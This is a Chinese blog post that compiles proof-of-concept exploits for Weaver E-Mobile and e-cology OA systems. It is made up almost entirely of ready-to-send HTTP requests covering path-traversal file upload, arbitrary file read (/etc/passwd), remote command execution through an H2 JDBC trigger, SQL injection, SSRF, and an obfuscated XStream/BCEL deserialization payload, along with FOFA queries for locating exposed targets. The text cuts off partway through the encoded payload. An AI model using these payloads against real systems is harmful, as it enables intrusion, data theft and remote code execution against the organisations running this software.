泛微最新漏洞汇总----实时更新!!!

已于 2024-09-20 17:13:40 修改
阅读量9k 收藏 27
点赞数 6
文章标签: 安全
于 2023-07-31 10:41:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57567655/article/details/132017321
版权

泛微E-Mobile系列

E-mobile lang2sql接口任意文件上传漏洞

title="移动管理平台-企业管理"

POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
Host: ip:port
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 226
Expect: 100-continue
Connection: close
 
------WebKitFormBoundarymVk33liI64J7GQaK
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/Check.txt"
 
This site has a vulnerability !!!
------WebKitFormBoundarymVk33liI64J7GQaK--

E-mobile client/cdnfile/接口存在任意文件读取

fofa:icon_hash="2062026853"

poc:

GET /client/cdnfile/1C/Windows/win.ini HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
GET /client/cdnfile/C/etc/passwd HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Host: xx.xx.xx.xx

泛微E-cology系列

e-cology-v10-H2 远程命令执行

影响范围
泛微e-cology-v10
网络空间测绘查询
body="/build/passport/static/js/lib.js" || body="/build/ecodesdk/static/js/lib.js"||icon_hash="-1619753057"

1.获取serviceTIcketId

POST /papi/passport/rest/appThirdLogin HTTP/1.1
Host: 11.11.11.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Length: 48
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate

username=sysadmin&service=1&ip=1&loginType=third

2.获取data

POST /papi/passport/login/generateEteamsId HTTP/1.1
Host: 11.11.11.11User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 56

stTicket={{serviceTicketId}}

3.加载org.h2.Driver数据库驱动类

POST /api/bs/iaauthclient/base/save HTTP/1.1
Host: 11.11.11.11
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Length: 86
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/json
Cookie: ETEAMS_TGC=TGT3680-PBpQuYoZlFULf5txX0HYNePnq97mS3q5FSb9qm7njxPcxe0sXBE; 
Origin: http://ip
ETEAMSID=THIRD_30a90b771dd1929f3200ad2191083b9e
Referer: http://ip/

{"isUse":1,"auth_type":"custom","iaAuthclientCustomDTO":{"ruleClass":"org.h2.Driver"}}

4.执行系统命令

POST /api/dw/connSetting/testConnByBasePassword HTTP/1.1
Host: <hostname>
Content-Length: 199
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://ip
Referer: http://ip/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
ETEAMSID: {{data}}

{
    "dbType": "mysql5",
    "dbUrl": "jdbc:h2:mem:test;MODE=MSSQLServer;init = CREATE TRIGGER hhhh BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$ javascript java.lang.Runtime.getRuntime().exec(\"{cmd}\") $$"
}

泛微e-cology HrmService SQL注入漏洞

poc :

POST /services/ModeDateService HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://xxx//services/Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ecology_JSessionid=aaasJ-HspHcxI5r2Krufz; JSESSIONID=aaasJ-HspHcxI5r2Krufz
Connection: close
SOAPAction: 
Content-Type: text/xml;charset=UTF-8
Host: xxx 
Content-Length: 405

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:mod="http://localhost/services/ModeDateService">
   <soapenv:Header/>   
   <soapenv:Body>
      <mod:getAllModeDataCount>
		<mod:in0>1</mod:in0>         
		<mod:in1>1</mod:in1>         
		<mod:in2>1=1</mod:in2>         
		<mod:in3>1</mod:in3>
	  </mod:getAllModeDataCount>
  </soapenv:Body>
</soapenv:Envelope>

 

泛微e-cology InformationLeakage信息泄露

GET /cloudstore/ecode/setup/ecology_dev.zip HTTP/1.1 
Host: {{Hostname}} 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36

泛微 e-cology  GetLabelByModule SQL注入

poc:

GET /api/ec/dev/locale/getLabelByModule?moduleCode=?moduleCode=?moduleCode=1%27)%20union%20all%20select%20%27666666,%27%20-- HTTP/1.1
Host: your-ip

泛微e-cology getFileViewUrl接口存在SSRF漏洞

POST /api/doc/mobile/fileview/getFileViewUrl HTTP/1.1
Host: xx.xxx.xx.xxx
User-Agent:Mozilla/5.0(Windows NT 10.0; WOW64)AppleWebKit/537.36(KHTML, like Gecko)Chrome/108.0.0.0Safari/537.36
Accept:*/*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 110
{
    "file_id": "1000",
    "file_name": "c",
    "download_url":"http://kitgeqiwwobfretc.t841xp.dnslog.cn"
}

泛微e-cology HrmService SQL注入漏洞


POST /services/HrmService HTTP/1.1
Host: 
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.88 Safari/537.36    
Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Connection: close
SOAPAction: urn:weaver.hrm.webservice.HrmService.getHrmDepartmentInfo
Content-Type: text/xml;charset=UTF-8 
Content-Length: 427        


geroet1)AND(db_name()like'ec%'

泛微e-cology WorkflowServiceXml SQL注入漏洞

fofa:app="泛微-OA(e-cology)"

POST /services/WorkflowServiceXml HTTP/1.1
or 
POST /services%20/WorkflowServiceXml HTTP/1.1
Host: 
User-Agent: Go-http-client/1.1
Content-Length: 475
Content-Type: text/xml
Accept-Encoding: gzip, deflate, br
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.services.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:doCreateWorkflowRequest><web:string>
&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#32;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#116;&#105;&#111;&#110;&#61;&#39;&#99;&#117;&#115;&#116;&#111;&#109;&#39;&#62;&#10;&#32;&#32;&#60;&#117;&#110;&#115;&#101;&#114;&#105;&#97;&#108;&#105;&#122;&#97;&#98;&#108;&#101;&#45;&#112;&#97;&#114;&#101;&#110;&#116;&#115;&#47;&#62;&#10;&#32;&#32;&#60;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#80;&#114;&#105;&#111;&#114;&#105;&#116;&#121;&#81;&#117;&#101;&#117;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#105;&#122;&#101;&#62;&#50;&#60;&#47;&#115;&#105;&#122;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#112;&#97;&#114;&#97;&#116;&#111;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#102;&#120;&#46;&#99;&#111;&#108;&#108;&#101;&#99;&#116;&#105;&#111;&#110;&#115;&#46;&#79;&#98;&#115;&#101;&#114;&#118;&#97;&#98;&#108;&#101;&#76;&#105;&#115;&#116;&#36;&#49;&#39;&#47;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#47;&#100;&#101;&#102;&#97;&#117;&#108;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#105;&#110;&#116;&#62;&#51;&#60;&#47;&#105;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#98;&#105;&#110;&#100;&#46;&#118;&#50;&#46;&#114;&#117;&#110;&#116;&#105;&#109;&#101;&#46;&#117;&#110;&#109;&#97;&#114;&#115;&#104;&#97;&#108;&#108;&#101;&#114;&#46;&#66;&#97;&#115;&#101;&#54;&#52;&#68;&#97;&#116;&#97;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#72;&#97;&#110;&#100;&#108;&#101;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#100;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#120;&#109;&#108;&#46;&#105;&#110;&#116;&#101;&#114;&#110;&#97;&#108;&#46;&#119;&#115;&#46;&#101;&#110;&#99;&#111;&#100;&#105;&#110;&#103;&#46;&#120;&#109;&#108;&#46;&#88;&#77;&#76;&#77;&#101;&#115;&#115;&#97;&#103;&#101;&#36;&#88;&#109;&#108;&#68;&#97;&#116;&#97;&#83;&#111;&#117;&#114;&#99;&#101;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#84;&#121;&#112;&#101;&#62;&#116;&#101;&#120;&#116;&#47;&#112;&#108;&#97;&#105;&#110;&#60;&#47;&#99;&#111;&#110;&#116;&#101;&#110;&#116;&#84;&#121;&#112;&#101;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#105;&#111;&#46;&#83;&#101;&#113;&#117;&#101;&#110;&#99;&#101;&#73;&#110;&#112;&#117;&#116;&#83;&#116;&#114;&#101;&#97;&#109;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#101;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#120;&#46;&#115;&#119;&#105;&#110;&#103;&#46;&#77;&#117;&#108;&#116;&#105;&#85;&#73;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#115;&#36;&#77;&#117;&#108;&#116;&#105;&#85;&#73;&#68;&#101;&#102;&#97;&#117;&#108;&#116;&#115;&#69;&#110;&#117;&#109;&#101;&#114;&#97;&#116;&#111;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#105;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#99;&#111;&#109;&#46;&#115;&#117;&#110;&#46;&#116;&#111;&#111;&#108;&#115;&#46;&#106;&#97;&#118;&#97;&#99;&#46;&#112;&#114;&#111;&#99;&#101;&#115;&#115;&#105;&#110;&#103;&#46;&#74;&#97;&#118;&#97;&#99;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#105;&#110;&#103;&#69;&#110;&#118;&#105;&#114;&#111;&#110;&#109;&#101;&#110;&#116;&#36;&#78;&#97;&#109;&#101;&#80;&#114;&#111;&#99;&#101;&#115;&#115;&#73;&#116;&#101;&#114;&#97;&#116;&#111;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#110;&#97;&#109;&#101;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#65;&#98;&#115;&#116;&#114;&#97;&#99;&#116;&#76;&#105;&#115;&#116;&#36;&#73;&#116;&#114;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#99;&#117;&#114;&#115;&#111;&#114;&#62;&#48;&#60;&#47;&#99;&#117;&#114;&#115;&#111;&#114;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#108;&#97;&#115;&#116;&#82;&#101;&#116;&#62;&#45;&#49;&#60;&#47;&#108;&#97;&#115;&#116;&#82;&#101;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#101;&#120;&#112;&#101;&#99;&#116;&#101;&#100;&#77;&#111;&#100;&#67;&#111;&#117;&#110;&#116;&#62;&#48;&#60;&#47;&#101;&#120;&#112;&#101;&#99;&#116;&#101;&#100;&#77;&#111;&#100;&#67;&#111;&#117;&#110;&#116;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#111;&#117;&#116;&#101;&#114;&#45;&#99;&#108;&#97;&#115;&#115;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#106;&#97;&#118;&#97;&#46;&#117;&#116;&#105;&#108;&#46;&#65;&#114;&#114;&#97;&#121;&#115;&#36;&#65;&#114;&#114;&#97;&#121;&#76;&#105;&#115;&#116;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#97;&#32;&#99;&#108;&#97;&#115;&#115;&#61;&#39;&#115;&#116;&#114;&#105;&#110;&#103;&#45;&#97;&#114;&#114;&#97;&#121;&#39;&#62;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#60;&#115;&#116;&#114;&#105;&#110;&#103;&#62;&#36;&#36;&#66;&#67;&#69;&#76;&#36;&#36;&#36;&#108;&#36;&#56;&#98;&#36;&#73;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#65;&#36;&#56;&#100;&#86;&#36;&#100;&#57;&#87;&#36;&#84;&#87;&#36;&#105;&#36;&#102;&#101;&#36;&#71;&#36;&#67;&#51;&#36;&#77;&#36;&#99;&#51;&#98;&#36;&#81;&#97;&#36;&#53;&#99;&#36;&#98;&#49;&#117;&#36;&#74;&#36;&#119;&#36;&#99;&#49;&#36;&#101;&#101;&#36;&#86;&#36;&#97;&#57;&#36;&#86;&#65;&#36;&#53;&#99;&#36;&#103;&#36;&#100;&#48;&#36;&#103;&#36;&#56;&#97;&#36;&#86;&#109;&#36;&#101;&#100;&#48;&#36;&#53;&#99;&#36;&#54;&#48;&#36;&#109;&#36;&#99;&#99;&#36;&#99;&#52;&#36;&#99;&#57;&#68;&#36;&#57;&#48;&#36;&#36;&#118;&#36;&#98;&#51;&#36;&#57;&#98;&#36;&#100;&#100;&#119;&#107;&#36;&#98;&#55;&#36;&#57;&#55;&#36;&#107;&#95;&#36;&#100;&#98;&#36;&#51;&#101;&#68;&#79;&#36;&#55;&#98;&#36;&#100;&#97;&#36;&#100;&#51;&#36;&#56;&#55;&#36;&#98;&#101;&#36;&#100;&#56;&#83;&#36;&#108;&#36;&#100;&#97;&#36;&#51;&#102;&#36;&#97;&#56;&#36;&#102;&#54;&#36;&#98;&#98;&#36;&#57;&#51;&#36;&#52;&#48;&#36;&#74;&#36;&#56;&#57;&#36;&#100;&#97;&#36;&#57;&#99;&#36;&#57;&#51;&#36;&#55;&#98;&#36;&#101;&#55;&#36;&#102;&#101;&#36;&#101;&#101;&#111;&#36;&#98;&#98;&#36;&#98;&#102;&#36;&#101;&#102;&#36;&#98;&#98;&#36;&#98;&#102;&#36;&#57;&#57;&#36;&#51;&#102;&#36;&#102;&#101;&#36;&#102;&#57;&#36;&#101;&#57;&#87;&#36;&#65;&#36;&#102;&#55;&#36;&#101;&#51;&#36;&#53;&#98;&#36;&#106;&#36;&#71;&#36;&#83;&#36;&#51;&#97;&#36;&#71;&#48;&#36;&#97;&#56;&#36;&#101;&#49;&#36;&#56;&#56;&#36;&#57;&#99;&#36;&#56;&#102;&#36;&#101;&#97;&#120;&#36;&#105;&#36;&#99;&#55;&#36;&#101;&#52;&#36;&#57;&#48;&#36;&#100;&#52;&#48;&#36;&#97;&#52;&#36;&#101;&#51;&#36;&#74;&#36;&#77;&#107;&#56;&#36;&#97;&#101;&#36;&#101;&#50;&#73;&#36;&#106;&#36;&#51;&#97;&#78;&#36;&#97;&#56;&#36;&#89;&#36;&#100;&#49;&#113;&#36;&#83;&#36;&#97;&#55;&#36;&#97;&#52;&#36;&#100;&#57;&#83;&#82;&#36;&#102;&#50;&#36;&#98;&#52;&#36;&#56;&#54;&#36;&#100;&#51;&#114;&#36;&#55;&#101;&#70;&#36;&#56;&#55;&#36;&#56;&#53;&#81;&#57;&#36;&#100;&#56;&#36;&#103;&#36;&#99;&#54;&#84;&#36;&#73;&#36;&#78;&#36;&#101;&#51;&#36;&#51;&#97;&#36;&#57;&#97;&#49;&#36;&#97;&#49;&#97;&#82;&#36;&#56;&#53;&#36;&#97;&#51;&#97;&#74;&#36;&#99;&#53;&#36;&#98;&#52;&#36;&#56;&#101;&#36;&#85;&#102;&#116;&#36;&#97;&#99;&#36;&#56;&#49;&#36;&#97;&#98;&#36;&#99;&#49;&#36;&#57;&#51;&#115;&#90;&#36;&#79;&#103;&#36;&#101;&#52;&#36;&#101;&#48;&#107;&#36;&#99;&#56;&#36;&#97;&#56;&#36;&#73;&#116;&#36;&#100;&#99;&#36;&#56;&#100;&#36;&#97;&#99;&#36;&#56;&#97;&#36;&#98;&#51;&#36;&#75;&#36;&#97;&#97;&#36;&#98;&#98;&#36;&#106;&#36;&#100;&#55;&#36;&#74;&#36;&#102;&#54;&#36;&#117;&#36;&#97;&#56;&#36;&#56;&#99;&#36;&#98;&#53;&#36;&#80;&#36;&#120;&#36;&#56;&#56;&#36;&#102;&#52;&#122;&#99;&#66;&#65;&#67;&#36;&#99;&#50;&#113;&#36;&#99;&#53;&#36;&#54;&#48;&#118;&#102;&#84;&#36;&#102;&#56;&#67;&#36;&#100;&#54;&#104;&#36;&#56;&#97;&#36;&#57;&#50;&#104;&#36;&#99;&#50;&#36;&#98;&#51;&#36;&#97;&#100;&#36;&#100;&#52;&#36;&#98;&#48;&#36;&#101;&#53;&#36;&#51;&#98;&#114;&#36;&#98;&#100;&#36;&#109;&#36;&#77;&#36;&#101;&#99;&#116;&#36;&#99;&#54;&#36;&#98;&#51;&#36;&#97;&#55;&#69;&#36;&#52;&#48;&#36;&#102;&#100;&#36;&#101;&#57;&#36;&#100;&#101;&#36;&#57;&#52;&#53;&#36;&#51;&#102;&#36;&#97;&#102;&#36;&#54;&#48;&#69;&#98;&#36;&#99;&#97;&#36;&#51;&#97;&#107;&#117;&#36;&#97;&#54;&#36;&#121;&#119;&#36;&#97;&#50;&#36;&#57;&#51;&#36;&#97;&#50;&#76;&#102;&#55;&#36;&#86;&#36;&#116;&#68;&#36;&#100;&#48;&#36;&#57;&#98;&#36;&#102;&#53;&#36;&#55;&#100;&#36;&#101;&#49;&#36;&#71;&#36;&#99;&#55;&#36;&#99;&#52;&#36;&#57;&#57;&#36;&#97;&#99;&#36;&#99;&#56;&#36;&#69;&#36;&#68;&#36;&#75;&#86;&#36;&#95;&#81;&#36;&#102;&#52;&#36;&#99;&#53;&#120;&#74;&#36;&#100;&#56;&#65;&#36;&#101;&#55;&#36;&#56;&#48;&#36;&#73;&#36;&#115;&#36;&#98;&#100;&#49;&#90;&#36;&#100;&#52;&#36;&#100;&#98;&#69;&#36;&#101;&#97;&#50;&#36;&#56;&#49;&#36;&#102;&#102;&#36;&#98;&#52;&#36;&#56;&#102;&#36;&#56;&#99;&#78;&#81;&#36;&#57;&#57;&#90;&#36;&#99;&#97;&#36;&#98;&#56;&#36;&#67;&#36;&#98;&#51;&#36;&#56;&#99;&#36;&#57;&#98;&#36;&#55;&#101;&#71;&#36;&#97;&#52;&#36;&#97;&#52;&#36;&#88;&#36;&#99;&#100;&#36;&#88;&#36;&#57;&#57;&#36;&#98;&#52;&#36;&#101;&#55;&#102;&#36;&#57;&#56;&#36;&#97;&#98;&#36;&#99;&#101;&#36;&#85;&#36;&#56;&#101;&#36;&#102;&#98;&#78;&#36;&#109;&#36;&#55;&#99;&#36;&#56;&#54;&#86;&#102;&#36;&#86;&#52;&#36;&#101;&#54;&#36;&#101;&#100;&#36;&#105;&#36;&#97;&#102;&#51;&#36;&#95;&#36;&#100;&#101;&#36;&#57;&#100;&#36;&#100;&#55;&#57;&#36;&#117;&#36;&#97;&#99;&#36;&#98;&#49;&#80;&#36;&#97;&#55;&#36;&#100;&#50;&#36;&#57;&#101;&#36;&#90;&#36;&#120;&#36;&#79;&#36;&#57;&#98;&#36;&#77;&#36;&#55;&#99;&#36;&#99;&#55;&#36;&#57;&#100;&#36;&#57;&#48;&#97;&#51;&#36;&#75;&#36;&#57;&#97;&#36;&#102;&#50;&#36;&#104;&#36;&#100;&#57;&#36;&#99;&#48;&#73;&#117;&#36;&#115;&#109;&#36;&#99;&#98;&#117;&#67;&#36;&#80;&#36;&#75;&#36;&#112;&#53;&#36;&#95;&#49;&#36;&#100;&#57;&#36;&#51;&#102;&#103;&#36;&#56;&#98;&#116;&#36;&#101;&#48;&#120;&#36;&#36;&#36;&#102;&#55;&#36;&#111;&#36;&#99;&#49;&#36;&#97;&#52;&#67;&#36;&#99;&#51;&#36;&#57;&#97;&#36;&#99;&#52;&#120;&#36;&#100;&#54;&#36;&#57;&#101;&#36;&#51;&#101;&#36;&#101;&#55;&#101;&#36;&#118;&#36;&#97;&#97;&#75;&#36;&#71;&#36;&#57;&#54;&#36;&#51;&#100;&#36;&#51;&#100;&#36;&#54;&#48;&#36;&#97;&#53;&#36;&#99;&#51;&#36;&#56;&#50;&#36;&#83;&#36;&#81;&#36;&#83;&#36;&#52;&#48;&#36;&#99;&#53;&#36;&#121;&#36;&#101;&#49;&#87;&#49;&#71;&#116;&#36;&#74;&#36;&#118;&#36;&#102;&#49;&#36;&#113;&#36;&#54;&#48;&#36;&#99;&#99;&#36;&#122;&#36;&#101;&#57;&#101;&#36;&#55;&#100;&#36;&#53;&#98;&#36;&#102;&#52;&#36;&#51;&#98;&#36;&#98;&#50;&#36;&#102;&#48;&#70;&#36;&#99;&#49;&#69;&#36;&#53;&#99;&#70;&#50;&#36;&#98;&#48;&#36;&#70;&#36;&#53;&#98;&#85;&#36;&#57;&#99;&#51;&#48;&#36;&#56;&#102;&#103;&#36;&#90;&#36;&#56;&#54;&#56;&#36;&#100;&#57;&#36;&#71;&#36;&#57;&#101;&#36;&#99;&#51;&#36;&#102;&#51;&#36;&#119;&#36;&#53;&#101;&#48;&#112;&#36;&#107;&#36;&#95;&#36;&#103;&#120;&#36;&#74;&#36;&#95;&#36;&#120;&#36;&#100;&#56;&#106;&#36;&#55;&#98;&#51;&#113;&#36;&#100;&#98;&#36;&#99;&#97;&#36;&#100;&#97;&#36;&#57;&#51;&#36;&#53;&#101;&#36;&#100;&#99;&#36;&#86;&#36;&#99;&#49;&#36;&#97;&#99;&#36;&#101;&#55;&#79;&#36;&#99;&#55;&#83;&#78;&#36;&#115;&#36;&#81;&#110;&#36;&#55;&#99;&#36;&#99;&#56;&#78;&#36;&#116;&#36;&#88;&#113;&#84;&#36;&#102;&#49;&#36;&#56;&#97;&#36;&#56;&#49;&#87;&#113;&#36;&#56;&#49;&#80;&#36;&#57;&#54;&#36;&#99;&#48;&#70;&#106;&#36;&#121;&#67;&#36;&#100;&#55;&#36;&#99;&#48;&#107;&#120;&#36;&#57;&#100;&#36;&#100;&#53;&#36;&#53;&#99;&#36;&#56;&#101;&#36;&#79;&#36;&#56;&#102;&#97;&#36;&#101;&#48;&#36;&#78;&#36;&#98;&#99;&#105;&#36;&#101;&#48;&#36;&#122;&#36;&#53;&#99;&#52;&#36;&#102;&#48;&#54;&#36;&#36;&#36;&#100;&#50;&#36;&#102;&#54;&#36;&#102;&#52;&#36;&#67;&#36;&#107;&#36;&#102;&#100;&#36;&#57;&#54;&#36;&#99;&#100;&#50;&#36;&#104;&#120;&#36;&#72;&#36;&#101;&#102;&#36;&#102;&#50;&#36;&#97;&#52;&#36;&#71;&#36;&#100;&#101;&#36;&#99;&#51;&#36;&#102;&#98;&#36;&#71;&#36;&#51;&#101;&#36;&#99;&#48;&#36;&#56;&#55;&#36;&#121;&#36;&#99;&#102;&#36;&#111;&#78;&#36;&#113;&#65;&#49;&#66;&#36;&#75;&#98;&#105;&#111;&#86;&#36;&#102;&#56;&#98;&#36;&#97;&#99;&#109;&#36;&#102;&#52;&#36;&#53;&#99;&#36;&#53;&#98;&#36;&#100;&#97;&#36;&#76;&#36;&#97;&#99;&#36;&#109;&#36;&#101;&#51;&#36;&#98;&#53;&#36;&#57;&#53;&#36;&#102;&#100;&#36;&#90;&#36;&#102;&#56;&#36;&#73;&#36;&#108;&#36;&#101;&#55;&#36;&#57;&#100;&#36;&#101;&#53;&#36;&#66;&#36;&#122;&#36;&#99;&#97;&#48;&#36;&#80;&#36;&#97;&#52;&#36;&#67;&#53;&#36;&#101;&#102;&#99;&#36;&#116;&#79;&#90;&#36;&#67;&#36;&#97;&#54;&#36;&#56;&#97;&#79;&#36;&#77;&#36;&#55;&#99;&#36;&#56;&#97;&#36;&#99;&#102;&#100;&#117;&#36;&#51;&#102;&#87;&#80;&#113;&#36;&#97;&#97;&#36;&#99;&#55;&#36;&#99;&#48;&#36;&#114;&#36;&#55;&#99;&#97;&#36;&#101;&#48;&#50;&#36;&#98;&#101;&#52;&#36;&#102;&#48;&#36;&#86;&#36;&#98;&#101;&#86;&#36;&#65;&#36;&#98;&#50;&#36;&#97;&#48;&#36;&#77;&#36;&#100;&#52;&#36;&#71;&#36;&#98;&#101;&#36;&#99;&#49;&#86;&#36;&#51;&#97;&#36;&#95;&#36;&#54;&#48;&#36;&#97;&#52;&#36;&#97;&#48;&#36;&#102;&#53;&#86;&#36;&#51;&#99;&#87;&#36;&#100;&#48;&#114;&#36;&#76;&#36;&#101;&#101;&#36;&#36;&#100;&#36;&#85;&#36;&#101;&#101;&#36;&#105;&#36;&#99;&#98;&#36;&#98;&#97;&#36;&#56;&#49;&#51;&#83;&#36;&#101;&#48;&#36;&#102;&#48;&#36;&#101;&#50;&#36;&#97;&#50;&#57;&#36;&#100;&#54;&#36;&#57;&#101;&#36;&#117;&#36;&#100;&#49;&#36;&#57;&#49;&#52;&#36;&#84;&#115;&#36;&#99;&#50;&#36;&#115;&#36;&#100;&#97;&#36;&#98;&#49;&#82;&#36;&#101;&#54;&#36;&#36;&#53;&#56;&#36;&#101;&#97;&#36;&#55;&#98;&#36;&#98;&#54;&#36;&#73;&#36;&#95;&#36;&#101;&#55;&#36;&#57;&#50;&#36;&#99;&#50;&#36;&#77;&#77;&#36;&#102;&#97;&#36;&#97;&#99;&#36;&#87;&#121;&#89;&#36;&#98;&#56;&#36;&#55;&#100;&#36;&#76;&#36;&#101;&#98;&#36;&#57;&#53;&#69;&#36;&#98;&#49;&#36;&#102;&#50;&#82;&#90;&#54;&#75;&#36;&#55;&#101;&#120;&#110;&#36;&#109;&#36;&#101;&#54;&#36;&#56;&#50;&#36;&#57;&#48;&#36;&#76;&#36;&#74;&#36;&#95;&#95;&#106;&#36;&#98;&#51;&#72;&#36;&#55;&#100;&#36;&#99;&#57;&#36;&#57;&#54;&#36;&#98;&#52;&#36;&#118;&#36;&#98;&#98;&#65;&#36;&#97;&#56;&#82;&#36;&#55;&#99;&#36;&#73;&#36;&#114;&#36;&#75;&#54;&#36;&#10